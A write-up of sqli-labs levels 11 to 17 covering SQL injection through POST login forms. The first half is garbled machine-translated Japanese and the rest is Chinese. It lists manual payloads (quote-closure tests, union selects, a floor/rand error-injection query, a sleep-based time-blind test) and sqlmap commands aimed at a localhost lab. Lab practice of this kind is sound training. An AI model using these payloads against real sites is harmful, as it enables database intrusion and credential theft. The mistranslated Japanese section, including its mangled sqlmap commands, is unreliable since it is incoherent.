これは、方法は同じであり、同一のテストポイントではないすべてのポスト噴射で数オフタイプのデータを含む、その差の型に注入します
0x01のSQLI-ラボ少ない11
1.ハンド
噴射式がポストされ、我々は、URL内のフォームに次の我々の入力データを入力することはできません、要求がポスト型データの一部であるため、また、キャプチャすることができ、データのSQL文注射の一部
私たちは、SQL文のエラーレポートを見つけ、1」、任意の入力時にパスワードでユーザー名を入力してください
その後、SQLインジェクションのユーザ名があり、我々はコメントに追いつく - +#に追いつくために、エコー誤りを発見した、エコー通常、それほど成功した閉鎖を見つけました
2#通常表示することにより、3「#誤差によるご注文、」順序
選択したデータベース組合を照会データベース()、2#
最初のパスバック動作と同様
2.sqlmap注入
キャプチャでげっぷ、そして、あなたはデータSQLMAPデータ部分を維持する必要があります
SQLMAP声明:
パイソンsqlmap.py -u " http://127.0.0.1/sqli-labs-master/Less-11/?id=1 " --data " は、uname = 1&passwdファイル= 11&提出=サブミット"
SIU --technique
--dbms mysqlの--dbs --threads 8
どこで:
--data:データセグメントが後で添加してもよい(POST / タイプが可能であるGET)
--threads:同時スレッドの最大数は、文字(このリクエスト7)を取得各々はブラインドであり、完了のためのスレッドの終了後、デフォルトでは、それ以外の場合は、サイトの可用性に影響を与える可能性があり、10を超えないように推奨され、1であります
選択するオプションはありませんので、理由もなくここに--batch
または非常に遅いです
0x02のSQLI-ラボ少ない12
1.ハンド注意
1つの入力のユーザ名」、任意の入力でpssword、エラー、入力1」、エラーがない場合、エラーが二重引用符でなければなりません
#コメント、またはエラーで、括弧で見つかったエラーメッセージを確認するために、閉じていません、
括弧ので、ユーザ名は次のとおりです。1「)#、パスワード任意の入力、正しいエコーは、その後、労働組合を選択してみてください、
通常の操作の後
2.sqlmap注入
私たちは、手動で試してみる(ユニバーサルコード)コメント文字データは、対応するパラメータ内に充填されたルールを除いて閉鎖されます
パイソンsqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-12/?id=1" "のuname =")または( "1")=(--data "1&のpasswd = 1 ")または(" 1 ")=(" 1&提出= --dbms mysqlの--dbs --threads 8米国を--technique「提出
0x03のSQLI-ラボ少ない13
1.ハンド注意
クロージャルールは次のとおりです。「)#
入力「)組合1,2-位選択し、表示位置が発見されず、エラーメッセージので、所定の噴射フロア
与えられた後に通常の動作を注射し
2.sqlmap注入
我々はより速く割れ、二つのパラメータユニバーサルパスワードの定期的な注入にデータを入力する必要があります
0x04のSQLI-ラボ少ない14
1.ハンド注意
输入”,报sql错误,输入“#成功闭合,因此闭合规则为:"#
在规则里面写入union select 1,2,正确查询没有显示,只会报错,因此同样采用报错注入
后面常规报错注入操作
2.sqlmap注入
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-14/?id=1" --data "uname=1&passwd=1&submit=Submit" --dbs --threads 8 --technique E --dbms mysql
0x05 sqli-labs less-15
1.手注
没有报错信息,试试1’and sleep(5)#也不行
应该是要登录用户名正确才行,试试admin'and sleep(5)#,发现延时5秒
参考第9关时间盲注的操作
2.sqlmap注入
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-15/?id=1" --data "uname=admin'or'1'='1&passwd='or'1'='1&submit=Submit" --current-db --threads 8 --technique T 或者 python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-15/?id=1" --data "uname=admin&passwd=1&submit=Submit" --current-db --threads 8 --technique T
0x06 sqli-labs less-16
将闭合规则的‘换成“,后面操作同15关
0x07 sqli-labs less-17
1.手注
单双引号在user name里面没有报错,那么看源码
没有对password进行检查,但是先检查的是uname,因此我们用户名必须正确,这里选择爆破,爆出用户名。这里用户名是admin
那么用户名处填入admin,密码处填入’报错,填入’#,正常显示,正常显示没有回显位,因此采用floor报错注入
构造语句:’ and (select 1 from (select count(*),concat((database()),floor (rand(0)*2))x from information_schema.tables group by x)a)#
后面报错注入的常规操作
2.sqlmap注入
python sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-17/" --data "uname=admin&passwd=password&submit=Submit" --current-db --threads 8 --technique E